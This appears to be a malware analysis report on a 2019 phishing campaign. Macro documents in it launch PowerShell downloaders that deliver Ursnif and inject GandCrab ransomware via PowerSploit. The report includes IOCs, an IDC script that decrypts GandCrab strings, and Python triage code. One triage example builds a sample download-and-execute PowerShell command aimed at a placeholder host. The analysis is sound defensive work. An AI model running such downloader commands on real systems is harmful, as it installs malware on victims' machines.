Ursnif and GandCrab campaign with the macro-enabled documents
Prepared for: LIFARS, LLC and its Subsidiaries
Prepared by: Ladislav Bačo
Date: 11/02/2019
This document and its content represent confidential information between LIFARS, LLC and company. As such, this document may not be shared with any outside party without the expressed consent of LIFARS, LLC and the company.
Overview
During the first half of February 2019 there was an increase in spam messages carrying attached documents named "Request" followed by a number, such as "Request15.doc". These documents contain slightly obfuscated macros that lead to the execution of a PowerShell downloader. The downloader connects to domains registered in the Russian Federation that resolve to Russian IP addresses. These servers appear to host malicious content, in many cases detected as the Ursnif malware.
Macro-enabled documents
The spam messages may contain either a password-protected zipped Word document (with the password "1234567" given in the email body) or the document itself.
The document usually has a blue background with text urging the recipient to enable macros, or to enable editing and content, as shown in the following pictures:
Fig. 1: Documents with request for enabling macros
Each type of document contains its own macro code: in the first case it is executed when the document is opened (AutoOpen), in the second case when the document is closed (AutoClose), see Figure 2:
244 Fifth Avenue, Suite 2035, New York, NY 10001
LIFARS.com (212) 222-7061 [email protected]
Fig. 2: Olevba tool output, AutoOpen and AutoClose macro execution
The macros can be extracted with the olevba tool. They are quite obfuscated: in the first case with multiple junk functions and Select statements, in the second case with multiple junk variables. The two types of obfuscation are shown below:
Fig. 3: First type of obfuscation
Fig. 4: Second type of obfuscation
After deobfuscation, these macros lead to running PowerShell with a Base64-encoded command. The first type executes PowerShell directly; the second type first executes a shell with a command taken from the AlternativeText property of a Shape object. This alternative text contains the command for executing PowerShell (in some cases the command first runs 'cmd.exe' and then 'powershell'):
Fig. 5: First type macro deobfuscated
Fig. 6: Second type macro deobfuscated
Fig. 7: Second type macro deobfuscated: shape with powershell command
PowerShell downloaders
Decoding the Base64 reveals that the first PowerShell command is obfuscated (see Fig. 8), but after a quick deobfuscation it is clear that it is a PowerShell downloader. It checks whether the downloaded executable file is at least 40 kB in size and, if so, executes it (Fig. 9).
Fig. 8: Obfuscated PowerShell downloader
Fig. 9: Deobfuscated PowerShell downloader
Decoding the PowerShell command from the second document yields another downloader, which in this case is not obfuscated. It tries two approaches: first, download a string and invoke it as a PowerShell command; second, download an executable file and run it via ShellExecute.
Fig. 10: PowerShell downloader from the second document
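The following Python script is an added example (not part of the original report) of how an analyst can triage the encoded PowerShell command lines described above: it decodes the UTF-16LE Base64 payload behind -EncodedCommand and flags the download-and-execute indicators that the two downloaders use (DownloadString with IEX, DownloadFile followed by execution, and the size check on the dropped file). The command line it scans is constructed for this example with non-routable example.invalid URLs; the indicator names and regular expressions are this example's own, not anything taken from the samples.

```python
import base64
import re
from typing import Dict, Optional

# Indicator patterns for the download-and-execute behaviour described in the
# report; the names and regexes are this example's own.
INDICATORS = {
    "download_string": re.compile(r"DownloadString", re.I),
    "download_file": re.compile(r"DownloadFile", re.I),
    "invoke_expression": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    "shell_execute": re.compile(r"ShellExecute", re.I),
    "start_process": re.compile(r"\b(?:Start-Process|Invoke-Item)\b", re.I),
    # the first downloader only runs the dropped EXE if it is at least 40 kB
    "size_check": re.compile(r"\.length\s*-g[te]\s*\d+", re.I),
}
URL_RX = re.compile(r"https?://[^\s'\"()]+", re.I)
ENC_RX = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def encode_command(script: str) -> str:
    """Build a -EncodedCommand value (UTF-16LE, Base64); used only to construct test input."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> str:
    """PowerShell's -EncodedCommand carries UTF-16LE text in Base64."""
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        # odd length or invalid surrogates: fall back so the bytes stay inspectable
        return raw.decode("latin-1")


def extract_encoded_blob(cmdline: str) -> Optional[str]:
    """Return the Base64 argument of -e/-ec/-enc/-EncodedCommand, if any."""
    m = ENC_RX.search(cmdline)
    return m.group(1) if m else None


def scan_indicators(script: str) -> Dict[str, object]:
    """Flag the fetch and execute primitives and collect the URLs the script contacts."""
    hits: Dict[str, object] = {name: bool(rx.search(script)) for name, rx in INDICATORS.items()}
    hits["urls"] = URL_RX.findall(script)
    fetch = hits["download_string"] or hits["download_file"]
    execute = hits["invoke_expression"] or hits["shell_execute"] or hits["start_process"]
    hits["downloader"] = bool(fetch and execute)
    return hits


def triage_commandline(cmdline: str) -> Dict[str, object]:
    """Decode the -enc payload if present, otherwise scan the command line as-is."""
    blob = extract_encoded_blob(cmdline)
    script = decode_encoded_command(blob) if blob else cmdline
    result = scan_indicators(script)
    result["decoded"] = script
    return result


# Constructed sample mirroring the second downloader's two methods; the URLs are
# non-routable placeholders, not the campaign's infrastructure.
SAMPLE_SCRIPT = (
    "$w=New-Object Net.WebClient;"
    "try{IEX $w.DownloadString('http://example.invalid/first.php')}catch{}"
    "$p=\"$env:TEMP\\drop.exe\";$w.DownloadFile('http://example.invalid/second.exe',$p);"
    "if((Get-Item $p).length -ge 40000){Start-Process $p}"
)
SAMPLE_CMDLINE = "powershell -nop -w hidden -enc " + encode_command(SAMPLE_SCRIPT)

if __name__ == "__main__":
    verdict = triage_commandline(SAMPLE_CMDLINE)
    print("downloader:", verdict["downloader"], "urls:", verdict["urls"])
```

In a SOC pipeline the input would be the process command line from Sysmon event ID 1 or a Windows 4688 event; the decoded script, not the Base64, is what the indicator scan and any URL extraction should run over.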
Ursnif campaign
Unfortunately, the downloaded content was no longer present during our analysis, and it was not available even during the analysis on Any.Run. Using the VirusTotal domain information, however, we can see that multiple executable files have been downloaded from this domain and most of them have been identified as the Ursnif spyware.
Fig. 11: VirusTotal domain information
Fig. 12: VirusTotal detections
It seems that more domains are involved in this campaign, with more "RequestXX.doc" documents. On Any.Run it is also possible to see the increase in the number of submissions with these filenames tagged as Ursnif. These samples have been submitted since 5 February 2019, and it seems that the campaign still continues, but with decreasing intensity.
Fig. 13: Any.Run public submissions
From these public submissions we can extract multiple domains contacted by the PowerShell downloaders. We can find even more samples with filenames like "Request15.doc" by using search engines (e.g. Google) targeted at sites related to malware analysis (e.g. VirusTotal, Hybrid-Analysis, ...). With this set of domains and samples, it is possible to reveal even more IOCs of this campaign, such as contacted URLs, documents with PowerShell downloaders, downloaded executable files, etc. VirusTotal Graph is a very useful tool for visualizing relationships between malware-related entities; creating an overview of the samples, the scope of the campaign and the country attribution can be a matter of several minutes. In this case, our investigation resulted in the following graph of malicious domains, URLs, documents and executable files:
Fig. 14: VirusTotal Graph of IOCs associated with the Ursnif campaign
The domains from the above examples have resolved to Russian IP addresses since the start of the attack (the US one is the exception: the domain pgarfielduozzelda.band has resolved to it only since 21 February, and the black flags are also Russian IP addresses according to whois), and most of these domains have been registered in the Russian Federation.
PowerShell downloader leading to GandCrab ransomware
During our analysis the downloaded content was not present on the involved servers, and in most cases it was not available even during analysis in sandboxes like Any.Run or Hybrid-Analysis. After a while, however, we were able to find at least one analysis on Any.Run in which the PowerShell downloader successfully downloaded the malicious content. The second document from the first part of our analysis is actually that sample, and its Any.Run report contains the downloaded data. Recall from the previous text that the analyzed document contains macros which lead to the execution of the encoded PowerShell command. After decoding we can see the following PowerShell downloader:
Fig. 15: Decoded PowerShell downloader
The first URL hxxp://89.223.92.190/704e.php (which is supplied to the DownloadString method) was active during the execution on Any.Run, so we can see the downloaded content, which is then invoked as a PowerShell expression (IEX in the picture above is the alias of the Invoke-Expression cmdlet).
Fig. 16: Captured communication with malicious URL
Fig. 17: Downloaded and executed content from the malicious URL
It is not obfuscated, and it is clear that this piece of PowerShell script again downloads and executes a string, but this time the content is downloaded from Pastebin. However, during the campaign only 8 AV engines detected this unobfuscated 2nd-stage PowerShell downloader:
Fig. 18: VirusTotal detections of 2nd PowerShell downloader
Moreover, the content downloaded from Pastebin has an even lower detection ratio, with a score of only 1/69:
Fig. 19: VirusTotal detections of pastebin content
Before we proceed with the content from Pastebin, it is useful to recall the behavior of the 2nd PowerShell downloader: it downloads and executes the script from hxxps://pastebin.com/raw/9see7UfF, and then it executes the function Invoke-HQLAPCCSDIGBUMKZIHEIZPFSX (probably defined in the content downloaded from Pastebin).
PowerShell injector from Pastebin
Now, let's continue with the Pastebin content. It is a mostly unobfuscated PowerShell script, too. It seems that only two function names are partially mangled: Invoke-HSOAWYAZUAGTMWM and the Invoke-HQLAPCCSDIGBUMKZIHEIZPFSX mentioned above. The parameters of these functions are also readable, and we can find names like PEBytes, ExeArgs, ProcName and ProcId, which give us a sense of what this script is probably able to do.
Fig. 20: PowerShell script from Pastebin
Scrolling down the script, we find code related to the structure of PE files (headers, sections, imports and exports) and code for accessing Win32 API functions often used for code injection, such as VirtualProtect, WriteProcessMemory and CreateRemoteThread.
Fig. 21: PowerShell code related to the structure of PE files
Fig. 22: PowerShell code related to the Win32 API functions used for code-injection
This code is pretty-formatted and easily readable, with meaningful variable and function names, unlike the macros and PowerShell from the first part of the analysis. This is a reason to assume that the code was copy-pasted from some publicly known tool. Searching for code snippets brings us to PowerSploit's Invoke-ReflectivePEInjection. Its name is self-describing: the script performs reflective injection of a PE file (DLL library) into the desired process and also loads all dependencies of the injected PE file. PowerSploit's Invoke-ReflectivePEInjection looks very similar to our Pastebin content, with one big difference at the end of our sample: the function Invoke-HQLAPCCSDIGBUMKZIHEIZPFSX contains Base64-encoded data used as the PEBytes argument of the function Invoke-HSOAWYAZUAGTMWM, which is the renamed Invoke-ReflectivePEInjection from PowerSploit:
Fig. 23: Base64-encoded PEBytes
Injected PE
After decoding the PEBytes32 we get a DLL file, which is detected by VirusTotal and Intezer as GandCrab ransomware:
Fig. 24: VT-Tool analysis of DLL file
Fig. 25: Intezer analysis of DLL file
Examining the strings of this DLL also reveals its original filename, krab5.dll, which points to version 5 of the well-known GandCrab ransomware (v5.1 in this case). The mentioned Any.Run analysis of this sample ended with a GandCrab infection, too:
Fig. 26: GandCrab ransom note from Any.Run analysis
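As an added example (not from the report or from the PowerSploit project), the Python below does what the "Injected PE" step describes: it pulls the long Base64 literal out of a PowerShell script, decodes it, verifies the MZ and PE signatures, reads the COFF Characteristics flag that marks the image as a DLL, and lists printable strings so that an original filename such as krab5.dll can be spotted without writing the DLL to disk. The PE blob in the test is built by build_minimal_image() from header fields only; it is a constructed stand-in that cannot be loaded, not the sample. All function names are this example's own.

```python
import base64
import re
import struct
from typing import Dict, List, Optional

IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_32BIT_MACHINE = 0x0100
IMAGE_FILE_DLL = 0x2000
MACHINE_NAMES = {0x14C: "i386", 0x8664: "amd64"}
# heuristic: a quoted Base64 run of at least 64 characters is the embedded PE
B64_LITERAL_RX = re.compile(r"['\"]([A-Za-z0-9+/]{64,}={0,2})['\"]")


def extract_pebytes(script: str) -> Optional[str]:
    """First long quoted Base64 literal in a PowerShell script (the PEBytes data)."""
    m = B64_LITERAL_RX.search(script)
    return m.group(1) if m else None


def ascii_strings(data: bytes, min_len: int = 5) -> List[str]:
    """Printable ASCII runs, the same thing 'strings' would show (e.g. the original DLL name)."""
    return [m.group().decode("ascii") for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def inspect_pe_bytes(blob: str) -> Dict[str, object]:
    """Decode a PEBytes blob and read the COFF header fields that tell an analyst
    what the injector was handed: architecture, DLL flag, build timestamp."""
    data = base64.b64decode(blob)
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, nsections, timestamp, _, _, opt_size, characteristics = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    magic = struct.unpack_from("<H", data, e_lfanew + 24)[0] if opt_size >= 2 else 0
    return {
        "size": len(data),
        "machine": MACHINE_NAMES.get(machine, hex(machine)),
        "sections": nsections,
        "timestamp": timestamp,
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
        "pe32plus": magic == 0x20B,
        "strings": ascii_strings(data),
    }


def is_pe_image(blob: str) -> bool:
    """True when the blob decodes to something with valid MZ/PE headers."""
    try:
        inspect_pe_bytes(blob)
        return True
    except (ValueError, struct.error):
        return False


def build_minimal_image(machine: int = 0x14C, timestamp: int = 0x5C5F0000,
                        characteristics: int = IMAGE_FILE_EXECUTABLE_IMAGE
                        | IMAGE_FILE_32BIT_MACHINE | IMAGE_FILE_DLL,
                        tail: bytes = b"krab5.dll\0") -> bytes:
    """Constructed test image: MZ stub, PE signature, COFF header, PE32 magic and a
    trailing string. Header-only and not loadable; it exists only to feed the parser."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew points right after the DOS header
    coff = struct.pack("<HHIIIHH", machine, 1, timestamp, 0, 0, 2, characteristics)
    return bytes(dos) + b"PE\0\0" + coff + struct.pack("<H", 0x10B) + tail


SAMPLE_PEBYTES = base64.b64encode(build_minimal_image()).decode("ascii")
# constructed stand-in for the Base64 literal at the end of the Pastebin script
SAMPLE_SCRIPT = "$PEBytes32 = [Convert]::FromBase64String('" + SAMPLE_PEBYTES + "')"
NOT_A_PE = base64.b64encode(b"MZ" + b"\0" * 100).decode("ascii")

if __name__ == "__main__":
    print(inspect_pe_bytes(extract_pebytes(SAMPLE_SCRIPT)))
```

For a real PEBytes blob the decoded bytes should be hashed and submitted to the usual services rather than executed; the header fields and strings above are enough to decide whether the blob is a 32-bit DLL and to pick the matching sandbox.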
Obfuscated strings in GandCrab
After a quick look at the disassembly we notice many calls to one particular function, named sub_10009E69 by IDA in our case. These calls appear right after a bunch of mov instructions with integer values as the second operands. These values are moved into a local variable placed on the stack. Before these mov instructions, we can see the address of that local variable being pushed onto the stack; usually the address is loaded into the eax register and then pushed. For a better picture, see the following screenshot taken from IDA:
Fig. 27: Obfuscated strings in GandCrab
Now, let's dive into the function sub_10009E69. For clarity, we renamed this function gandcrab_decrypt_string. It takes one string argument (char *) and extracts from it the encryption key, the encrypted data and the length of the encrypted data (computed as the XOR of two DWORD values). In this case the encryption key is always 0x10 bytes long (key_length in the script in the Appendix). These are then used as the parameters of the decryption routine, which is RC4 in this case.
Fig. 28: Decrypt string function, which prepares parameters for RC4 decryption
Decryption of the strings
At this point we know enough about the string obfuscation, and we should be able to decrypt these obfuscated strings even without executing the sample in a debugger. It is time to create an IDA script for automatic decryption of these strings. We chose the IDC language instead of IDAPython, mainly because IDAPython is officially not available in the freeware or demo version of IDA, so an IDC script should be more usable for enthusiasts and students without an IDA Pro license.
The next steps are more challenging: we need to reconstruct the string argument of gandcrab_decrypt_string and, finally, extract the parameters for the RC4 decryption (key, data_length and data), then decrypt the obfuscated strings and display the decrypted values, e.g. as a comment in the disassembly and as a log line in the script output window.
Putting it all together, we have the IDC script for GandCrab string decryption. After running it, we obtain the following output from the decryption script:
Fig. 29: Decrypted strings in GandCrab disassembly
Fig. 30: Decrypted strings, script output
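The argument layout described in the "Obfuscated strings in GandCrab" section and the stack reconstruction done by the IDC script, as an added Python example that is not the report's script: the fixed key length, the two XORed length DWORDs and the RC4 step follow the report, build_argument() is a constructed encoder used only to produce test data (RC4 is symmetric), and reconstruct_argument() rebuilds the argument from (ebp offset, immediate) pairs the way the script walks the mov instructions before the call. The sample key, plaintexts and ebp offsets are constructed for this example.

```python
import struct
from typing import List, Tuple

KEY_LENGTH = 0x10  # fixed key length, as key_length in the report's IDC script


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: KSA, then PRGA XORed over data (encrypt and decrypt are the same)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])  # index is (S[i] + S[j]) mod 256
    return bytes(out)


def parse_argument(arg: bytes) -> Tuple[bytes, int, bytes]:
    """Split the decrypt-function argument: key[0x10] | len_a[4] | len_b[4] | ciphertext,
    where the real ciphertext length is len_a XOR len_b (little-endian DWORDs)."""
    if len(arg) < KEY_LENGTH + 8:
        raise ValueError("argument too short")
    key = arg[:KEY_LENGTH]
    len_a, len_b = struct.unpack_from("<II", arg, KEY_LENGTH)
    length = len_a ^ len_b
    data = arg[KEY_LENGTH + 8:KEY_LENGTH + 8 + length]
    if len(data) != length:
        raise ValueError("ciphertext shorter than the XORed length")
    return key, length, data


def decrypt_string(arg: bytes) -> str:
    """Decrypt one reconstructed argument and render it like the IDC script does."""
    key, _, data = parse_argument(arg)
    plain = rc4(key, data)
    # same heuristic as the IDC script: a zero second byte means a UTF-16LE string
    if len(plain) > 1 and plain[1] == 0:
        return plain.decode("utf-16-le", errors="replace").rstrip("\0")
    return plain.decode("latin-1").rstrip("\0")


def build_argument(key: bytes, plaintext: bytes, mask: int = 0xDEADBEEF) -> bytes:
    """Constructed encoder (not taken from the sample): produces a blob in the
    layout above so the decoder can be exercised offline."""
    if len(key) != KEY_LENGTH:
        raise ValueError("key must be 0x10 bytes")
    return key + struct.pack("<II", len(plaintext) ^ mask, mask) + rc4(key, plaintext)


def reconstruct_argument(movs: List[Tuple[int, int]], base_offset: int) -> bytes:
    """Rebuild the argument from (ebp-relative offset, imm32) pairs, the way the IDC
    script walks the 'mov [ebp-off], imm' stores preceding the call. base_offset is
    the offset taken by 'lea reg, [ebp-off]' and pushed as the argument."""
    end = max(off for off, _ in movs) + 4  # the highest store still writes 4 bytes
    buf = bytearray(end - base_offset)
    for off, imm in movs:
        if off >= base_offset:
            struct.pack_into("<I", buf, off - base_offset, imm & 0xFFFFFFFF)
    return bytes(buf)


def split_into_movs(arg: bytes, base_offset: int) -> List[Tuple[int, int]]:
    """Constructed helper, the inverse of reconstruct_argument: fakes the
    disassembly's immediate stores for the test."""
    padded = arg + b"\0" * (-len(arg) % 4)
    return [(base_offset + i, struct.unpack_from("<I", padded, i)[0])
            for i in range(0, len(padded), 4)]


# Constructed sample: a 16-byte key and a UTF-16LE process name like those in the appendix
SAMPLE_KEY = bytes(range(KEY_LENGTH))
SAMPLE_ARG = build_argument(SAMPLE_KEY, "winword.exe".encode("utf-16-le") + b"\0\0")

if __name__ == "__main__":
    movs = split_into_movs(SAMPLE_ARG, -0x40)
    print(decrypt_string(reconstruct_argument(movs, -0x40)))
```

The RC4 index in the PRGA must be reduced after the addition, (S[i] + S[j]) mod 256; reducing only one term lets the sum run past the table and yields wrong bytes, which is the kind of single-character damage visible in a few of the decrypted strings in the Appendix.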
From the list of decrypted strings in the Appendix it is clear which programs are of interest to GandCrab. It kills all running instances of Office programs, because they can block the encryption of opened files. It also checks for antivirus programs. There are also mentions of GandCrab itself (keys, messages, instructions for decryption and so on).
Conclusion
The two types of macro-enabled documents with a PowerShell downloader, spread via emails in a malicious campaign, were presented in the first part of the analysis. The PowerShell downloaders and/or the macros are slightly obfuscated; however, it is easy to defeat this obfuscation and reveal their purpose. The analysis also summarized the information and relationships between malware samples and domains related to this campaign and provided a summary of the collected IOCs in the Appendix.
While most of the URLs contacted in the Ursnif campaign from February 2019 have been cleaned (or, at least, did not provide any malicious content during our analysis or during publicly available analyses on various sandboxes), in at least one case a URL was active. This URL came from the PowerShell downloader with two options/methods for downloading and executing the malicious content. Probably one method was used for downloading the Ursnif malware and the second led to infection with GandCrab ransomware: the PowerShell downloader included in the VBA macro downloaded the 2nd-stage downloader, which uses the PowerSploit reflective injection for injecting the GandCrab DLL into its process. This case was covered in the 2nd part of the analysis.
GandCrab ransomware v5.1 contains obfuscated, RC4-encrypted strings and text messages, and because there was no available analytical tool for deobfuscating these strings (only for a much older version of GandCrab), we decided to create our own tool as an IDC script for the IDA disassembler. This IDC script was further adjusted to work also with GandCrab v5.2 and v5.3. The developed script and the list of decrypted strings are provided in the Appendix.
References
https://app.any.run/tasks/11e3d6bf-7166-4211-a9fd-cd0f264af9c7
https://app.any.run/tasks/54be5309-8bcc-41aa-adc0-84507d6bdb86
https://app.any.run/tasks/6492677c-c4a5-4866-93c6-dc2fcdabcd99
https://www.virustotal.com/#/domain/hkf98ua36ou.com
https://www.virustotal.com/#/file/60ea9fba1999ea637eeeea71045277d0e191e9854931c0e4a59649d5fa2d35b9
https://www.virustotal.com/graph/embed/gfbc000ebc04146588a291146a3f927d0bd26f5e068c2479fb69d7b5e2684af1f
https://pastebin.com/r6bcVjA9
Any.Run analysis
VirusTotal analysis of 2nd PowerShell downloader
URLhaus entry for PE injector from Pastebin
VirusTotal analysis of PE injector from Pastebin
PowerSploit's Invoke-ReflectivePEInjection
VirusTotal analysis of injected GandCrab DLL
Intezer analysis of injected GandCrab DLL
IDC script for GandCrab string decryption on GitHub
https://www.baco.sk/posts/ursnif-requestdoc-campaign-1/
https://www.baco.sk/posts/ursnif-requestdoc-campaign-2/
https://www.baco.sk/posts/gandcrab-string-decryption-1/
https://www.baco.sk/posts/gandcrab-string-decryption-update/
Appendix
IDC script for GandCrab string decryption

#include <idc.idc>

// RC4 decryption of the first `length` bytes of `data` with the `key_length`-byte `key`
// (the function header and the declarations were lost in extraction and are restored
// from the call in main())
static RC4_decrypt(key, key_length, data, length) {
    auto S = strfill('\x00', 256);
    auto i, w, b, K, index;

    //Key-scheduling algorithm
    for (i=0; i<256; i++){
        S[i] = i;
    }
    w = 0;
    for (i=0; i<256; i++){
        w = (w + ord(S[i]) + ord(key[i % key_length])) % 256;
        b = S[i]; S[i] = S[w]; S[w] = b;
    }

    //decrypting, xor ciphertext with pseudorandom stream of bytes
    i = w = 0;
    for (index=0; index<length; index++) {
        i = (i + 1) % 256;
        w = (w + ord(S[i])) % 256;
        b = S[i]; S[i] = S[w]; S[w] = b;
        // the keystream byte is S[(S[i] + S[w]) mod 256]; the sum must be reduced as a whole,
        // otherwise sums above 255 index past the table and produce wrong bytes
        K = ord(S[(ord(S[i]) + ord(S[w])) % 256]);
        data[index] = ord(data[index]) ^ K;
    }
    return data;
}

// convert a UTF-16LE string to ASCII by keeping every second byte
static wchar2ascii(str) {
    auto i;
    auto ret = "";
    for (i=0; i<strlen(str); i=i+2) {
        ret = ret + str[i];
    }
    return ret;
}

// little-endian DWORD from the first 4 bytes of a string
static str2dword(str) {
    auto i, ret;
    ret = 0;
    for (i=3; i>=0; i--) {
        ret = ret*0x100 + ord(str[i]);
    }
    //print("str2dword", str, ret);
    return ret;
}

static get_push_reg(addr) {
    // find argument (register name) for string decrypt function
    // in the form of "push %reg"
    while (GetMnem(addr) != "push") {
        //Message(" %08lx\t%s\n", addr, GetDisasm(addr));
        addr = FindCode(addr, SEARCH_UP | SEARCH_NEXT);
    }
    //Message("push\n %08lx\t%s\n", addr, GetDisasm(addr));
    // get register name
    return GetOpnd(addr, 0);
}

static get_reg_offset(addr, reg) {
    // find the instruction which sets the value of the pushed register
    // in the form of "lea, %reg, [ebp-offset]"
    do {
        addr = FindCode(addr, SEARCH_UP | SEARCH_NEXT);
    } while ((GetMnem(addr) != "lea") || (GetOpnd(addr,0) != reg));
    //Message("set value\n %08lx\t%s\n", addr, GetDisasm(addr));
    // instruction in the form of "lea %eax, [%ebp-offset]"
    return GetOperandValue(addr,1);
}

static get_start_addr_of_string(addr, offset) {
    // find the address of the instruction which sets the first bytes of reconstructed string
    // in the form of "mov [ebp-offset], imm"
    do {
        addr = FindCode(addr, SEARCH_UP | SEARCH_NEXT);
    } while ((GetMnem(addr) != "mov") || (GetOpType(addr,1) != o_imm) || (GetOperandValue(addr,0) != offset));
    return addr;
}

static get_max_offset(addr1, addr2) {
    // find the max offset (aka end of the reconstructed string) across the "mov [ebp-offset], imm" instructions
    auto addr, offset, max = -0x1fffffff;
    for (addr = addr1; addr < addr2; addr = FindCode(addr, SEARCH_DOWN | SEARCH_NEXT)) {
        if ((GetMnem(addr) == "mov") && (GetOpType(addr,1) == o_imm)) {
            offset = GetOperandValue(addr,0);
            if (offset > max) {
                max = offset;
            }
        }
    }
    return max;
}

static get_string_argument(ref) {
    auto addr, reg, ebp_offset, ebp_max_offset, arglength, argument;
    // get register name from the instruction "push %reg"
    reg = get_push_reg(ref);
    // get ebp offset stored in register by instruction "lea, %reg, [ebp-offset]"
    // aka start of the reconstructed string argument
    ebp_offset = get_reg_offset(ref, reg);
    // find the instruction which sets the first bytes of reconstructed string
    addr = get_start_addr_of_string(ref, ebp_offset);
    // find the max ebp offset, aka end of the reconstructed string argument
    ebp_max_offset = get_max_offset(addr, ref);
    // +4: the mov at the highest offset still stores a full dword
    arglength = ebp_max_offset - ebp_offset + 4;
    argument = strfill('\x00', arglength);
    //Message(" ebp_offset=%x, ebp_max_offset=%x, arglength=%x, addr=%08lx\n", ebp_offset, ebp_max_offset, arglength, addr);
    // reconstruct string argument from instruction like "mov [ebp-offset], value"
    auto offset, value;
    for (addr; addr < ref; addr=FindCode(addr,SEARCH_DOWN|SEARCH_NEXT)) {
        // instruction like "mov [ebp-offset], value"
        if ((GetMnem(addr) == "mov") && (GetOpType(addr,1) == o_imm)) {
            offset = GetOperandValue(addr,0);
            // set value for desired string argument starting at [ebp-ebp_offset]
            if (offset-ebp_offset >= 0) {
                value = GetOperandValue(addr,1);
                //Message(" %08lx\t[%d] = %08x\n", addr, offset-ebp_offset, value);
                //Message(" %08lx\t%s\n", addr, GetDisasm(addr));
                //convert dword value to bytes in string
                auto i;
                for (i=0; i<4; i++) {
                    argument[offset-ebp_offset+i] = value & 0xFF;
                    value = value>>8;
                }
            }
        }
    }
    //Message(" %08lx\targument\n", ref);
    //print(argument);
    return argument;
}

static count_xrefs(addr) {
    auto ref, count;
    count = 0;
    ref = RfirstB(addr);
    while (ref!=BADADDR) {
        count = count + 1;
        ref = RnextB(addr,ref);
    }
    //Message("%08x: %d, %x\n", addr, count, GetFunctionAttr(addr,FUNCATTR_FRSIZE));
    return count;
}

static find_decrypt_function() {
    // find the address of the string decryption function with following conditions:
    //   it is short (up to 0x25 bytes)
    //   it is heavily used (at least 100 xrefs)
    //   it contains exactly one call instruction (for calling RC4 decryption routine)
    //   it contains exactly 5 push instructions (one push ebp from prologue and 4 arguments for RC4)
    auto func_start, func_end, found;
    found = 0;
    func_start = NextFunction(0);
    while ((func_start!=BADADDR) && (found == 0)) {
        func_start = NextFunction(func_start);
        func_end = FindFuncEnd(func_start);
        if (func_end-func_start < 0x25) {
            auto addr, push_count, call_count;
            push_count = 0;
            call_count = 0;
            addr = func_start;
            while (addr < func_end) {
                if (GetMnem(addr) == "push") push_count = push_count + 1;
                if (GetMnem(addr) == "call") call_count = call_count + 1;
                addr = FindCode(addr, SEARCH_DOWN | SEARCH_NEXT);
            }
            if ((push_count == 5) && (call_count == 1) && (count_xrefs(func_start) > 100)) {
                found = 1;
            }
        }
        //Message("%08x: %08x, %d --> %d\n", func_start, func_end, count_xrefs(func_start), found);
    }
    return func_start;
}

static main() {
    Message("\n=====GandCrab String Decryptor=====\n\n");
    auto ea, ref;
    // string decrypt function
    //ea = 0x407563;
    ea = find_decrypt_function();
    // get first xref to calling decrypt function
    ref = RfirstB(ea);
    while (ref!=BADADDR) {
        //ref = 0x10006866;
        Message("%08lx: xref to decrypt function %08lx \n", ref, ea);
        // find xrefs to calling decrypt function
        if ((XrefType() == fl_CN) || (XrefType() == fl_CF)) {
            // reconstructs string argument
            auto argument = get_string_argument(ref);
            // parse parameters from string argument
            auto key_length = 0x10;
            auto key = substr(argument,0,key_length);
            auto data = substr(argument,key_length+8,-1);
            auto length = str2dword(substr(argument,key_length,key_length+4)) ^ str2dword(substr(argument,key_length+4,key_length+8));
            //print(length);
            // if the string is too long, there may be an error, or it can be long binary data
            if (length < 0x10000) {
                auto text = RC4_decrypt(key, key_length, data, length);
                auto plaintext;
                // simple check for widechar string
                if (text[1] == '\x00') {
                    plaintext = wchar2ascii(text);
                } else {
                    plaintext = text;
                }
                // prints decrypted string to output window
                Message("\"%s\" (length: 0x%x)\n\n", plaintext, strlen(plaintext));
                // puts comment at the call of the decryption function
                MakeComm(ref, plaintext);
            }
        }
        ref = RnextB(ea,ref);
    }
    //auto ret = RC4_decrypt("OJ\xABkMp\x10\x9B\xA4\xCF\x041\xD0\x7Fe\xDE", 0x10, "\xD8#(\xDALF\x90\r\xC3\xAC\xFA\x0F\xBE\xBA\xB3k\xD5\xE7\xB5\xF0\x06""7", 0x16);
    //msg("\"%s\" (wchar length: 0x%x)\n", wchar2ascii(ret), strlen(ret));
}

List of decrypted strings
"Global\iyAzNATdi7a94U8TAO7zVm5qzEjzks" (length: 0x26)
"Global\%s.luck" (length: 0x10)
"@hashbreaker Daniel J. Bernstein let's dance salsa <3" (length: 0x36)
"@hashbreaker :)))" (length: 0x12)
"A" (length: 0x2)
"onenote.exe" (length: 0xc)
"outlook.exe" (length: 0xc)
"powerpnt.exe" (length: 0xe)
"steam.exe" (length: 0xa)
"thebat.exe" (length: 0xc)
"thebat64.exe" (length: 0xe)
"thunderbird.exe" (length: 0x10)
"visio.exe" (length: 0xa)
"winword.exe" (length: 0xc)
"wordpad.exe" (length: 0xc)
"runas" (length: 0x6)
"—BEGIN GANDCRAB KEY—" (length: 0x1a)
"—END GANDCRAB KEY—" (length: 0x18)
"—BEGIN PC DATA—" (length: 0x14)
"—END PC DATA—" (length: 0x12)
"pc_user" (length: 0x8)
"pc_name" (length: 0x8)
"pc_group" (length: 0xa)
"av" (length: 0x4)
"pc_lang" (length: 0x8)
"pc_keyb" (length: 0x8)
